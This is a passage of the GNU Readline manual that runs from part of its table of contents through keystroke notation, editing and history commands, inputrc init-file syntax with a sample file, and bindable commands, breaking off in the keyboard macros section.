Readline Movement Commands. . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.2.3
Readline Killing Commands . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.2.4
Readline Arguments. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.2.5
Searching for Commands in the History. . . . . . . . . . . . . . . . . . . . 3
1.3
Readline Init File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.3.1
Readline Init File Syntax . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.3.2
Conditional Init Constructs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
1.3.3
Sample Init File. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
1.4
Bindable Readline Commands. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.4.1
Commands For Moving. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.4.2
Commands For Manipulating The History . . . . . . . . . . . . . . . . 13
1.4.3
Commands For Changing Text . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
1.4.4
Killing And Yanking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
1.4.5
Specifying Numeric Arguments . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
1.4.6
Letting Readline Type For You. . . . . . . . . . . . . . . . . . . . . . . . . . . 17
1.4.7
Keyboard Macros . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
1.4.8
Some Miscellaneous Commands . . . . . . . . . . . . . . . . . . . . . . . . . . 18
1.5
Readline vi Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
2
Programming with GNU Readline. . . . . . . . . . . 20
2.1
Basic Behavior . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
2.2
Custom Functions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
2.2.1
Readline Typedefs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
2.2.2
Writing a New Function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
2.3
Readline Variables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
2.4
Readline Convenience Functions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
2.4.1
Naming a Function. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
2.4.2
Selecting a Keymap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
2.4.3
Binding Keys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
2.4.4
Associating Function Names and Bindings . . . . . . . . . . . . . . . . 30
2.4.5
Allowing Undoing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
2.4.6
Redisplay . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
2.4.7
Modifying Text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
2.4.8
Character Input. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
2.4.9
Terminal Management. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
2.4.10
Utility Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
2.4.11
Miscellaneous Functions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
2.4.12
Alternate Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
2.4.13
A Readline Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
ii
2.5
Readline Signal Handling. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
2.6
Custom Completers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
2.6.1
How Completing Works . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
2.6.2
Completion Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
2.6.3
Completion Variables. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
2.6.4
A Short Completion Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
Appendix A
GNU Free Documentation License
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
Concept Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
Function and Variable Index . . . . . . . . . . . . . . . . . . . . . 65
Chapter 1: Command Line Editing
1
1 Command Line Editing
This chapter describes the basic features of the gnu command line editing interface.
1.1 Introduction to Line Editing
The following paragraphs describe the notation used to represent keystrokes.
The text C-k is read as ‘Control-K’ and describes the character produced when the k
key is pressed while the Control key is depressed.
The text M-k is read as ‘Meta-K’ and describes the character produced when the Meta
key (if you have one) is depressed, and the k key is pressed. The Meta key is labeled ALT
on many keyboards. On keyboards with two keys labeled ALT (usually to either side of the
space bar), the ALT on the left side is generally set to work as a Meta key. The ALT key on
the right may also be configured to work as a Meta key or may be configured as some other
modifier, such as a Compose key for typing accented characters.
If you do not have a Meta or ALT key, or another key working as a Meta key, the identical
keystroke can be generated by typing ESC first, and then typing k. Either process is known
as metafying the k key.
The text M-C-k is read as ‘Meta-Control-k’ and describes the character produced by
metafying C-k.
In addition, several keys have their own names. Specifically, DEL, ESC, LFD, SPC, RET,
and TAB all stand for themselves when seen in this text, or in an init file (see Section 1.3
[Readline Init File], page 4). If your keyboard lacks a LFD key, typing C-j will produce the
desired character. The RET key may be labeled Return or Enter on some keyboards.
1.2 Readline Interaction
Often during an interactive session you type in a long line of text, only to notice that the
first word on the line is misspelled. The Readline library gives you a set of commands for
manipulating the text as you type it in, allowing you to just fix your typo, and not forcing
you to retype the majority of the line. Using these editing commands, you move the cursor
to the place that needs correction, and delete or insert the text of the corrections. Then,
when you are satisfied with the line, you simply press RET. You do not have to be at the end
of the line to press RET; the entire line is accepted regardless of the location of the cursor
within the line.
1.2.1 Readline Bare Essentials
In order to enter characters into the line, simply type them. The typed character appears
where the cursor was, and then the cursor moves one space to the right. If you mistype a
character, you can use your erase character to back up and delete the mistyped character.
Sometimes you may mistype a character, and not notice the error until you have typed
several other characters. In that case, you can type C-b to move the cursor to the left, and
then correct your mistake. Afterwards, you can move the cursor to the right with C-f.
When you add text in the middle of a line, you will notice that characters to the right
of the cursor are ‘pushed over’ to make room for the text that you have inserted. Likewise,
when you delete text behind the cursor, characters to the right of the cursor are ‘pulled
Chapter 1: Command Line Editing
2
back’ to fill in the blank space created by the removal of the text. A list of the bare essentials
for editing the text of an input line follows.
C-b
Move back one character.
C-f
Move forward one character.
DEL or Backspace
Delete the character to the left of the cursor.
C-d
Delete the character underneath the cursor.
Printing characters
Insert the character into the line at the cursor.
C-_ or C-x C-u
Undo the last editing command. You can undo all the way back to an empty
line.
(Depending on your configuration, the Backspace key be set to delete the character to the
left of the cursor and the DEL key set to delete the character underneath the cursor, like
C-d, rather than the character to the left of the cursor.)
1.2.2 Readline Movement Commands
The above table describes the most basic keystrokes that you need in order to do editing of
the input line. For your convenience, many other commands have been added in addition
to C-b, C-f, C-d, and DEL. Here are some commands for moving more rapidly about the
line.
C-a
Move to the start of the line.
C-e
Move to the end of the line.
M-f
Move forward a word, where a word is composed of letters and digits.
M-b
Move backward a word.
C-l
Clear the screen, reprinting the current line at the top.
Notice how C-f moves forward a character, while M-f moves forward a word. It is a loose
convention that control keystrokes operate on characters while meta keystrokes operate on
words.
1.2.3 Readline Killing Commands
Killing text means to delete the text from the line, but to save it away for later use, usually
by yanking (re-inserting) it back into the line. (‘Cut’ and ‘paste’ are more recent jargon for
‘kill’ and ‘yank’.)
If the description for a command says that it ‘kills’ text, then you can be sure that you
can get the text back in a different (or the same) place later.
When you use a kill command, the text is saved in a kill-ring. Any number of consecutive
kills save all of the killed text together, so that when you yank it back, you get it all. The
kill ring is not line specific; the text that you killed on a previously typed line is available
to be yanked back later, when you are typing another line.
Here is the list of commands for killing text.
Chapter 1: Command Line Editing
3
C-k
Kill the text from the current cursor position to the end of the line.
M-d
Kill from the cursor to the end of the current word, or, if between words, to the
end of the next word. Word boundaries are the same as those used by M-f.
M-DEL
Kill from the cursor the start of the current word, or, if between words, to the
start of the previous word. Word boundaries are the same as those used by
M-b.
C-w
Kill from the cursor to the previous whitespace. This is different than M-DEL
because the word boundaries differ.
Here is how to yank the text back into the line.
Yanking means to copy the most-
recently-killed text from the kill buffer.
C-y
Yank the most recently killed text back into the buffer at the cursor.
M-y
Rotate the kill-ring, and yank the new top. You can only do this if the prior
command is C-y or M-y.
1.2.4 Readline Arguments
You can pass numeric arguments to Readline commands. Sometimes the argument acts
as a repeat count, other times it is the sign of the argument that is significant. If you
pass a negative argument to a command which normally acts in a forward direction, that
command will act in a backward direction. For example, to kill text back to the start of
the line, you might type ‘M-- C-k’.
The general way to pass numeric arguments to a command is to type meta digits before
the command. If the first ‘digit’ typed is a minus sign (‘-’), then the sign of the argument
will be negative. Once you have typed one meta digit to get the argument started, you
can type the remainder of the digits, and then the command. For example, to give the C-d
command an argument of 10, you could type ‘M-1 0 C-d’, which will delete the next ten
characters on the input line.
1.2.5 Searching for Commands in the History
Readline provides commands for searching through the command history for lines containing
a specified string. There are two search modes: incremental and non-incremental.
Incremental searches begin before the user has finished typing the search string. As each
character of the search string is typed, Readline displays the next entry from the history
matching the string typed so far. An incremental search requires only as many characters as
needed to find the desired history entry. To search backward in the history for a particular
string, type C-r. Typing C-s searches forward through the history. The characters present
in the value of the isearch-terminators variable are used to terminate an incremental
search. If that variable has not been assigned a value, the ESC and C-J characters will
terminate an incremental search.
C-g will abort an incremental search and restore the
original line. When the search is terminated, the history entry containing the search string
becomes the current line.
To find other matching entries in the history list, type C-r or C-s as appropriate. This
will search backward or forward in the history for the next entry matching the search string
typed so far. Any other key sequence bound to a Readline command will terminate the
Chapter 1: Command Line Editing
4
search and execute that command. For instance, a RET will terminate the search and accept
the line, thereby executing the command from the history list. A movement command will
terminate the search, make the last line found the current line, and begin editing.
Readline remembers the last incremental search string. If two C-rs are typed without
any intervening characters defining a new search string, any remembered search string is
used.
Non-incremental searches read the entire search string before starting to search for
matching history lines.
The search string may be typed by the user or be part of the
contents of the current line.
1.3 Readline Init File
Although the Readline library comes with a set of Emacs-like keybindings installed by
default, it is possible to use a different set of keybindings. Any user can customize programs
that use Readline by putting commands in an inputrc file, conventionally in his home
directory. The name of this file is taken from the value of the environment variable INPUTRC.
If that variable is unset, the default is ‘~/.inputrc’. If that file does not exist or cannot
be read, the ultimate default is ‘/etc/inputrc’.
When a program which uses the Readline library starts up, the init file is read, and the
key bindings are set.
In addition, the C-x C-r command re-reads this init file, thus incorporating any changes
that you might have made to it.
1.3.1 Readline Init File Syntax
There are only a few basic constructs allowed in the Readline init file. Blank lines are
ignored. Lines beginning with a ‘#’ are comments. Lines beginning with a ‘$’ indicate
conditional constructs (see Section 1.3.2 [Conditional Init Constructs], page 10).
Other
lines denote variable settings and key bindings.
Variable Settings
You can modify the run-time behavior of Readline by altering the values of
variables in Readline using the set command within the init file. The syntax
is simple:
set variable value
Here, for example, is how to change from the default Emacs-like key binding to
use vi line editing commands:
set editing-mode vi
Variable names and values, where appropriate, are recognized without regard
to case. Unrecognized variable names are ignored.
Boolean variables (those that can be set to on or off) are set to on if the value is
null or empty, on (case-insensitive), or 1. Any other value results in the variable
being set to off.
A great deal of run-time behavior is changeable with the following variables.
bell-style
Controls what happens when Readline wants to ring the termi-
nal bell. If set to ‘none’, Readline never rings the bell. If set to
Chapter 1: Command Line Editing
5
‘visible’, Readline uses a visible bell if one is available. If set to
‘audible’ (the default), Readline attempts to ring the terminal’s
bell.
bind-tty-special-chars
If set to ‘on’, Readline attempts to bind the control characters
treated specially by the kernel’s terminal driver to their Readline
equivalents.
comment-begin
The string to insert at the beginning of the line when the insert-
comment command is executed. The default value is "#".
completion-ignore-case
If set to ‘on’, Readline performs filename matching and completion
in a case-insensitive fashion. The default value is ‘off’.
completion-prefix-display-length
The length in characters of the common prefix of a list of possible
completions that is displayed without modification. When set to a
value greater than zero, common prefixes longer than this value are
replaced with an ellipsis when displaying possible completions.
completion-query-items
The number of possible completions that determines when the user
is asked whether the list of possibilities should be displayed. If the
number of possible completions is greater than this value, Readline
will ask the user whether or not he wishes to view them; otherwise,
they are simply listed. This variable must be set to an integer value
greater than or equal to 0. A negative value means Readline should
never ask. The default limit is 100.
convert-meta
If set to ‘on’, Readline will convert characters with the eighth bit set
to an ascii key sequence by stripping the eighth bit and prefixing
an ESC character, converting them to a meta-prefixed key sequence.
The default value is ‘on’.
disable-completion
If set to ‘On’, Readline will inhibit word completion. Completion
characters will be inserted into the line as if they had been mapped
to self-insert. The default is ‘off’.
editing-mode
The editing-mode variable controls which default set of key bind-
ings is used. By default, Readline starts up in Emacs editing mode,
where the keystrokes are most similar to Emacs. This variable can
be set to either ‘emacs’ or ‘vi’.
echo-control-characters
When set to ‘on’, on operating systems that indicate they support
it, readline echoes a character corresponding to a signal generated
from the keyboard. The default is ‘on’.
Chapter 1: Command Line Editing
6
enable-keypad
When set to ‘on’, Readline will try to enable the application keypad
when it is called. Some systems need this to enable the arrow keys.
The default is ‘off’.
enable-meta-key
When set to ‘on’, Readline will try to enable any meta modifier
key the terminal claims to support when it is called.
On many
terminals, the meta key is used to send eight-bit characters. The
default is ‘on’.
expand-tilde
If set to ‘on’, tilde expansion is performed when Readline attempts
word completion. The default is ‘off’.
history-preserve-point
If set to ‘on’, the history code attempts to place the point (the
current cursor position) at the same location on each history line
retrieved with previous-history or next-history. The default
is ‘off’.
history-size
Set the maximum number of history entries saved in the history
list. If set to zero, the number of entries in the history list is not
limited.
horizontal-scroll-mode
This variable can be set to either ‘on’ or ‘off’. Setting it to ‘on’
means that the text of the lines being edited will scroll horizontally
on a single screen line when they are longer than the width of the
screen, instead of wrapping onto a new screen line. By default, this
variable is set to ‘off’.
input-meta
If set to ‘on’, Readline will enable eight-bit input (it will not clear
the eighth bit in the characters it reads), regardless of what the
terminal claims it can support. The default value is ‘off’. The
name meta-flag is a synonym for this variable.
isearch-terminators
The string of characters that should terminate an incremental
search without subsequently executing the character as a command
(see Section 1.2.5 [Searching], page 3).
If this variable has not
been given a value, the characters ESC and C-J will terminate an
incremental search.
keymap
Sets Readline’s idea of the current keymap for key binding com-
mands.
Acceptable keymap names are emacs, emacs-standard,
emacs-meta,
emacs-ctlx,
vi,
vi-move,
vi-command,
and
vi-insert. vi is equivalent to vi-command; emacs is equivalent
to emacs-standard. The default value is emacs. The value of the
editing-mode variable also affects the default keymap.
Chapter 1: Command Line Editing
7
mark-directories
If set to ‘on’, completed directory names have a slash appended.
The default is ‘on’.
mark-modified-lines
This variable, when set to ‘on’, causes Readline to display an as-
terisk (‘*’) at the start of history lines which have been modified.
This variable is ‘off’ by default.
mark-symlinked-directories
If set to ‘on’, completed names which are symbolic links to di-
rectories have a slash appended (subject to the value of mark-
directories). The default is ‘off’.
match-hidden-files
This variable, when set to ‘on’, causes Readline to match files whose
names begin with a ‘.’ (hidden files) when performing filename
completion, unless the leading ‘.’ is supplied by the user in the
filename to be completed. This variable is ‘on’ by default.
output-meta
If set to ‘on’, Readline will display characters with the eighth bit
set directly rather than as a meta-prefixed escape sequence. The
default is ‘off’.
page-completions
If set to ‘on’, Readline uses an internal more-like pager to display
a screenful of possible completions at a time. This variable is ‘on’
by default.
print-completions-horizontally
If set to ‘on’, Readline will display completions with matches sorted
horizontally in alphabetical order, rather than down the screen.
The default is ‘off’.
revert-all-at-newline
If set to ‘on’, Readline will undo all changes to history lines before
returning when accept-line is executed. By default, history lines
may be modified and retain individual undo lists across calls to
readline. The default is ‘off’.
show-all-if-ambiguous
This alters the default behavior of the completion functions. If set
to ‘on’, words which have more than one possible completion cause
the matches to be listed immediately instead of ringing the bell.
The default value is ‘off’.
show-all-if-unmodified
This alters the default behavior of the completion functions in a
fashion similar to show-all-if-ambiguous. If set to ‘on’, words which
have more than one possible completion without any possible par-
tial completion (the possible completions don’t share a common
Chapter 1: Command Line Editing
8
prefix) cause the matches to be listed immediately instead of ring-
ing the bell. The default value is ‘off’.
skip-completed-text
If set to ‘on’, this alters the default completion behavior when in-
serting a single match into the line. It’s only active when perform-
ing completion in the middle of a word. If enabled, readline does
not insert characters from the completion that match characters
after point in the word being completed, so portions of the word
following the cursor are not duplicated. For instance, if this is en-
abled, attempting completion when the cursor is after the ‘e’ in
‘Makefile’ will result in ‘Makefile’ rather than ‘Makefilefile’,
assuming there is a single possible completion. The default value
is ‘off’.
visible-stats
If set to ‘on’, a character denoting a file’s type is appended to the
filename when listing possible completions. The default is ‘off’.
Key Bindings
The syntax for controlling key bindings in the init file is simple.
First you
need to find the name of the command that you want to change. The following
sections contain tables of the command name, the default keybinding, if any,
and a short description of what the command does.
Once you know the name of the command, simply place on a line in the init
file the name of the key you wish to bind the command to, a colon, and then
the name of the command. There can be no space between the key name and
the colon – that will be interpreted as part of the key name. The name of
the key can be expressed in different ways, depending on what you find most
comfortable.
In addition to command names, readline allows keys to be bound to a string
that is inserted when the key is pressed (a macro).
keyname: function-name or macro
keyname is the name of a key spelled out in English. For example:
Control-u: universal-argument
Meta-Rubout: backward-kill-word
Control-o: "> output"
In the above example, C-u is bound to the function universal-
argument, M-DEL is bound to the function backward-kill-word,
and C-o is bound to run the macro expressed on the right hand
side (that is, to insert the text ‘> output’ into the line).
A number of symbolic character names are recognized while pro-
cessing this key binding syntax: DEL, ESC, ESCAPE, LFD, NEW-
LINE, RET, RETURN, RUBOUT, SPACE, SPC, and TAB.
"keyseq": function-name or macro
keyseq differs from keyname above in that strings denoting an en-
tire key sequence can be specified, by placing the key sequence in
Chapter 1: Command Line Editing
9
double quotes. Some gnu Emacs style key escapes can be used, as
in the following example, but the special character names are not
recognized.
"\C-u": universal-argument
"\C-x\C-r": re-read-init-file
"\e[11~": "Function Key 1"
In the above example, C-u is again bound to the function
universal-argument (just as it was in the first example), ‘C-x
C-r’ is bound to the function re-read-init-file, and ‘ESC [ 1 1
~’ is bound to insert the text ‘Function Key 1’.
The following gnu Emacs style escape sequences are available when specifying
key sequences:
\C-
control prefix
\M-
meta prefix
\e
an escape character
\\
backslash
\"
", a double quotation mark
\’
’, a single quote or apostrophe
In addition to the gnu Emacs style escape sequences, a second set of backslash
escapes is available:
\a
alert (bell)
\b
backspace
\d
delete
\f
form feed
\n
newline
\r
carriage return
\t
horizontal tab
\v
vertical tab
\nnn
the eight-bit character whose value is the octal value nnn (one to
three digits)
\xHH
the eight-bit character whose value is the hexadecimal value HH
(one or two hex digits)
When entering the text of a macro, single or double quotes must be used to
indicate a macro definition. Unquoted text is assumed to be a function name. In
the macro body, the backslash escapes described above are expanded. Backslash
will quote any other character in the macro text, including ‘"’ and ‘’’. For
example, the following binding will make ‘C-x \’ insert a single ‘\’ into the line:
"\C-x\\": "\\"
Chapter 1: Command Line Editing
10
1.3.2 Conditional Init Constructs
Readline implements a facility similar in spirit to the conditional compilation features of
the C preprocessor which allows key bindings and variable settings to be performed as the
result of tests. There are four parser directives used.
$if
The $if construct allows bindings to be made based on the editing mode, the
terminal being used, or the application using Readline. The text of the test
extends to the end of the line; no characters are required to isolate it.
mode
The mode= form of the $if directive is used to test whether Readline
is in emacs or vi mode. This may be used in conjunction with the
‘set keymap’ command, for instance, to set bindings in the emacs-
standard and emacs-ctlx keymaps only if Readline is starting out
in emacs mode.
term
The term= form may be used to include terminal-specific key bind-
ings, perhaps to bind the key sequences output by the terminal’s
function keys. The word on the right side of the ‘=’ is tested against
both the full name of the terminal and the portion of the terminal
name before the first ‘-’. This allows sun to match both sun and
sun-cmd, for instance.
application
The application construct is used to include application-specific set-
tings. Each program using the Readline library sets the application
name, and you can test for a particular value. This could be used to
bind key sequences to functions useful for a specific program. For
instance, the following command adds a key sequence that quotes
the current or previous word in Bash:
$if Bash
# Quote the current or previous word
"\C-xq": "\eb\"\ef\""
$endif
$endif
This command, as seen in the previous example, terminates an $if command.
$else
Commands in this branch of the $if directive are executed if the test fails.
$include
This directive takes a single filename as an argument and reads commands
and bindings from that file. For example, the following directive reads from
‘/etc/inputrc’:
$include /etc/inputrc
1.3.3 Sample Init File
Here is an example of an inputrc file. This illustrates key binding, variable assignment, and
conditional syntax.
Chapter 1: Command Line Editing
11
# This file controls the behaviour of line input editing for
# programs that use the GNU Readline library.
Existing
# programs include FTP, Bash, and GDB.
#
# You can re-read the inputrc file with C-x C-r.
# Lines beginning with ’#’ are comments.
#
# First, include any systemwide bindings and variable
# assignments from /etc/Inputrc
$include /etc/Inputrc
#
# Set various bindings for emacs mode.
set editing-mode emacs
$if mode=emacs
Meta-Control-h:
backward-kill-word Text after the function name is ignored
#
# Arrow keys in keypad mode
#
#"\M-OD":
backward-char
#"\M-OC":
forward-char
#"\M-OA":
previous-history
#"\M-OB":
next-history
#
# Arrow keys in ANSI mode
#
"\M-[D":
backward-char
"\M-[C":
forward-char
"\M-[A":
previous-history
"\M-[B":
next-history
#
# Arrow keys in 8 bit keypad mode
#
#"\M-\C-OD":
backward-char
#"\M-\C-OC":
forward-char
#"\M-\C-OA":
previous-history
#"\M-\C-OB":
next-history
#
# Arrow keys in 8 bit ANSI mode
#
#"\M-\C-[D":
backward-char
#"\M-\C-[C":
forward-char
Chapter 1: Command Line Editing
12
#"\M-\C-[A":
previous-history
#"\M-\C-[B":
next-history
C-q: quoted-insert
$endif
# An old-style binding.
This happens to be the default.
TAB: complete
# Macros that are convenient for shell interaction
$if Bash
# edit the path
"\C-xp": "PATH=${PATH}\e\C-e\C-a\ef\C-f"
# prepare to type a quoted word --
# insert open and close double quotes
# and move to just after the open quote
"\C-x\"": "\"\"\C-b"
# insert a backslash (testing backslash escapes
# in sequences and macros)
"\C-x\\": "\\"
# Quote the current or previous word
"\C-xq": "\eb\"\ef\""
# Add a binding to refresh the line, which is unbound
"\C-xr": redraw-current-line
# Edit variable on current line.
"\M-\C-v": "\C-a\C-k$\C-y\M-\C-e\C-a\C-y="
$endif
# use a visible bell if one is available
set bell-style visible
# don’t strip characters to 7 bits when reading
set input-meta on
# allow iso-latin1 characters to be inserted rather
# than converted to prefix-meta sequences
set convert-meta off
# display characters with the eighth bit set directly
# rather than as meta-prefixed characters
set output-meta on
# if there are more than 150 possible completions for
# a word, ask the user if he wants to see all of them
set completion-query-items 150
Chapter 1: Command Line Editing
13
# For FTP
$if Ftp
"\C-xg": "get \M-?"
"\C-xt": "put \M-?"
"\M-.": yank-last-arg
$endif
1.4 Bindable Readline Commands
This section describes Readline commands that may be bound to key sequences. Command
names without an accompanying key sequence are unbound by default.
In the following descriptions, point refers to the current cursor position, and mark refers
to a cursor position saved by the set-mark command. The text between the point and
mark is referred to as the region.
1.4.1 Commands For Moving
beginning-of-line (C-a)
Move to the start of the current line.
end-of-line (C-e)
Move to the end of the line.
forward-char (C-f)
Move forward a character.
backward-char (C-b)
Move back a character.
forward-word (M-f)
Move forward to the end of the next word. Words are composed of letters and
digits.
backward-word (M-b)
Move back to the start of the current or previous word. Words are composed
of letters and digits.
clear-screen (C-l)
Clear the screen and redraw the current line, leaving the current line at the top
of the screen.
redraw-current-line ()
Refresh the current line. By default, this is unbound.
1.4.2 Commands For Manipulating The History
accept-line (Newline or Return)
Accept the line regardless of where the cursor is. If this line is non-empty, it
may be added to the history list for future recall with add_history(). If this
line is a modified history line, the history line is restored to its original state.
previous-history (C-p)
Move ‘back’ through the history list, fetching the previous command.
Chapter 1: Command Line Editing
14
next-history (C-n)
Move ‘forward’ through the history list, fetching the next command.
beginning-of-history (M-<)
Move to the first line in the history.
end-of-history (M->)
Move to the end of the input history, i.e., the line currently being entered.
reverse-search-history (C-r)
Search backward starting at the current line and moving ‘up’ through the his-
tory as necessary. This is an incremental search.
forward-search-history (C-s)
Search forward starting at the current line and moving ‘down’ through the the
history as necessary. This is an incremental search.
non-incremental-reverse-search-history (M-p)
Search backward starting at the current line and moving ‘up’ through the his-
tory as necessary using a non-incremental search for a string supplied by the
user.
non-incremental-forward-search-history (M-n)
Search forward starting at the current line and moving ‘down’ through the the
history as necessary using a non-incremental search for a string supplied by the
user.
history-search-forward ()
Search forward through the history for the string of characters between the
start of the current line and the point. This is a non-incremental search. By
default, this command is unbound.
history-search-backward ()
Search backward through the history for the string of characters between the
start of the current line and the point. This is a non-incremental search. By
default, this command is unbound.
yank-nth-arg (M-C-y)
Insert the first argument to the previous command (usually the second word
on the previous line) at point. With an argument n, insert the nth word from
the previous command (the words in the previous command begin with word
0). A negative argument inserts the nth word from the end of the previous
command. Once the argument n is computed, the argument is extracted as if
the ‘!n’ history expansion had been specified.
yank-last-arg (M-. or M-_)
Insert last argument to the previous command (the last word of the previous
history entry). With an argument, behave exactly like yank-nth-arg. Succes-
sive calls to yank-last-arg move back through the history list, inserting the
last argument of each line in turn. The history expansion facilities are used to
extract the last argument, as if the ‘!$’ history expansion had been specified.
Chapter 1: Command Line Editing
15
1.4.3 Commands For Changing Text
delete-char (C-d)
Delete the character at point. If point is at the beginning of the line, there
are no characters in the line, and the last character typed was not bound to
delete-char, then return eof.
backward-delete-char (Rubout)
Delete the character behind the cursor. A numeric argument means to kill the
characters instead of deleting them.
forward-backward-delete-char ()
Delete the character under the cursor, unless the cursor is at the end of the
line, in which case the character behind the cursor is deleted. By default, this
is not bound to a key.
quoted-insert (C-q or C-v)
Add the next character typed to the line verbatim. This is how to insert key
sequences like C-q, for example.
tab-insert (M-TAB)
Insert a tab character.
self-insert (a, b, A, 1, !, ...)
Insert yourself.
transpose-chars (C-t)
Drag the character before the cursor forward over the character at the cursor,
moving the cursor forward as well. If the insertion point is at the end of the
line, then this transposes the last two characters of the line. Negative arguments
have no effect.
transpose-words (M-t)
Drag the word before point past the word after point, moving point past that
word as well. If the insertion point is at the end of the line, this transposes the
last two words on the line.
upcase-word (M-u)
Uppercase the current (or following) word. With a negative argument, upper-
case the previous word, but do not move the cursor.
downcase-word (M-l)
Lowercase the current (or following) word. With a negative argument, lowercase
the previous word, but do not move the cursor.
capitalize-word (M-c)
Capitalize the current (or following) word. With a negative argument, capitalize
the previous word, but do not move the cursor.
overwrite-mode ()
Toggle overwrite mode. With an explicit positive numeric argument, switches
to overwrite mode. With an explicit non-positive numeric argument, switches to
insert mode. This command affects only emacs mode; vi mode does overwrite
differently. Each call to readline() starts in insert mode.
Chapter 1: Command Line Editing
16
In overwrite mode, characters bound to self-insert replace the text at point
rather than pushing the text to the right.
Characters bound to backward-
delete-char replace the character before point with a space.
By default, this command is unbound.
1.4.4 Killing And Yanking
kill-line (C-k)
Kill the text from point to the end of the line.
backward-kill-line (C-x Rubout)
Kill backward to the beginning of the line.
unix-line-discard (C-u)
Kill backward from the cursor to the beginning of the current line.
kill-whole-line ()
Kill all characters on the current line, no matter where point is. By default,
this is unbound.
kill-word (M-d)
Kill from point to the end of the current word, or if between words, to the end
of the next word. Word boundaries are the same as forward-word.
backward-kill-word (M-DEL)
Kill the word behind point. Word boundaries are the same as backward-word.
unix-word-rubout (C-w)
Kill the word behind point, using white space as a word boundary. The killed
text is saved on the kill-ring.
unix-filename-rubout ()
Kill the word behind point, using white space and the slash character as the
word boundaries. The killed text is saved on the kill-ring.
delete-horizontal-space ()
Delete all spaces and tabs around point. By default, this is unbound.
kill-region ()
Kill the text in the current region. By default, this command is unbound.
copy-region-as-kill ()
Copy the text in the region to the kill buffer, so it can be yanked right away.
By default, this command is unbound.
copy-backward-word ()
Copy the word before point to the kill buffer. The word boundaries are the
same as backward-word. By default, this command is unbound.
copy-forward-word ()
Copy the word following point to the kill buffer. The word boundaries are the
same as forward-word. By default, this command is unbound.
yank (C-y)
Yank the top of the kill ring into the buffer at point.
Chapter 1: Command Line Editing
17
yank-pop (M-y)
Rotate the kill-ring, and yank the new top. You can only do this if the prior
command is yank or yank-pop.
1.4.5 Specifying Numeric Arguments
digit-argument (M-0, M-1, ... M--)
Add this digit to the argument already accumulating, or start a new argument.
M-- starts a negative argument.
universal-argument ()
This is another way to specify an argument. If this command is followed by one
or more digits, optionally with a leading minus sign, those digits define the ar-
gument. If the command is followed by digits, executing universal-argument
again ends the numeric argument, but is otherwise ignored. As a special case,
if this command is immediately followed by a character that is neither a digit
or minus sign, the argument count for the next command is multiplied by four.
The argument count is initially one, so executing this function the first time
makes the argument count four, a second time makes the argument count six-
teen, and so on. By default, this is not bound to a key.
1.4.6 Letting Readline Type For You
complete (TAB)
Attempt to perform completion on the text before point. The actual completion
performed is application-specific. The default is filename completion.
possible-completions (M-?)
List the possible completions of the text before point.
insert-completions (M-*)
Insert all completions of the text before point that would have been generated
by possible-completions.
menu-complete ()
Similar to complete, but replaces the word to be completed with a single match
from the list of possible completions. Repeated execution of menu-complete
steps through the list of possible completions, inserting each match in turn.
At the end of the list of completions, the bell is rung (subject to the setting
of bell-style) and the original text is restored. An argument of n moves n
positions forward in the list of matches; a negative argument may be used to
move backward through the list. This command is intended to be bound to
TAB, but is unbound by default.
menu-complete-backward ()
Identical to menu-complete, but moves backward through the list of possible
completions, as if menu-complete had been given a negative argument.
delete-char-or-list ()
Deletes the character under the cursor if not at the beginning or end of the line
(like delete-char). If at the end of the line, behaves identically to possible-
completions. This command is unbound by default.
Chapter 1: Command Line Editing
18
1.4.7 Keyboard Macros
start-kbd-macro (C-x ()
Begin saving the characters typed into the current keyboard macro.
end-kbd-macro (C-x ))
